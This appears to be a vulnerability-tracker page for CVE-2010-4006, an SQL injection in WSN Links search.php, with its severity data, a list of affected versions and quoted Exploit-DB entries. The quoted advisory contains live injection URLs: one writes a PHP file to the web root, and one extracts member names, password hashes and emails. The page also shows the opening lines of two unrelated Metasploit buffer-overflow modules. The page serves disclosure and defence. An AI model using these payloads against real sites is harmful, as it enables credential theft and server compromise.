CVE-2010-4006
published 2010-11-03CVE-2010-4006: Multiple SQL injection vulnerabilities in search.php in WSN Links 5.0.x before 5.0.81, 5.1.x before 5.1.51, and 6.0.x before 6.0.1 allow remote attackers to…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.15%
62.7th percentile
Multiple SQL injection vulnerabilities in search.php in WSN Links 5.0.x before 5.0.81, 5.1.x before 5.1.51, and 6.0.x before 6.0.1 allow remote attackers to execute arbitrary SQL commands via the (1) namecondition or (2) namesearch parameter.
Affected
132 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | links | — | — |
| wsn | wsn_links | — | — |
| wsn | wsn_links | — | — |
| wsn | wsn_links | — | — |
| wsn | wsn_links | — | — |
| wsn | wsn_links | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WSN Links - SQL Injection
exploitdb·2010-11-24·CVSS 7.5
CVE-2010-4006 [HIGH] WSN Links - SQL Injection
WSN Links - SQL Injection
---
'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)
Mark Stanislav - [email protected]
I. DESCRIPTION
A vulnerability exists in the search.php code that allows for SQL injection of various parameters. By assembling portions of SQL code between the affected parameters, successful SQL injection into the software can occur. In the testing done, various 'UNION SELECT' SQL injections can occur.
II. AFFECTED VERSIONS
"%20INTO%20OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories
2) A 'UNION SELECT' which results in a member's name, password hash, and e-mail to be extracted to a file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_
Exploit-DB
Microsoft Windows RSH daemon - Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2007-4006 Microsoft Windows RSH daemon - Remote Buffer Overflow (Metasploit)
Microsoft Windows RSH daemon - Remote Buffer Overflow (Metasploit)
---
##
# $Id: windows_rsh.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Windows RSH daemon Buffer Overflow',
'Description' => %q{
This module exploits a vulnerabliltiy in Windows RSH daemon 1.8.
The vulnerability is due to a failure to check for the length of input sent
to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit
to be successful.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 91
Exploit-DB
RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)
exploitdb·2010-03-10
CVE-2009-4006 RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)
RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)
---
##
# $Id: servu_session_cookie.rb 8762 2010-03-10 05:58:01Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Rhinosoft Serv-U Session Cookie Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5.
Sending a specially crafted POST request with an overly long session cookie
string, an attacker may be able to execute arbitrary code.
},
'Author' =>
[
'Nikolas Rangos ',
'M.Yanagishita ',
'jduck'
],
'License' =>
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2010-10/0512.htmlhttp://www.exploit-db.com/exploits/15607http://www.securityfocus.com/archive/1/514585/100/0/threadedhttp://www.securityfocus.com/bid/44593http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/https://exchange.xforce.ibmcloud.com/vulnerabilities/62939http://archives.neohapsis.com/archives/fulldisclosure/2010-10/0512.htmlhttp://www.exploit-db.com/exploits/15607http://www.securityfocus.com/archive/1/514585/100/0/threadedhttp://www.securityfocus.com/bid/44593http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/https://exchange.xforce.ibmcloud.com/vulnerabilities/62939
2010-11-03
Published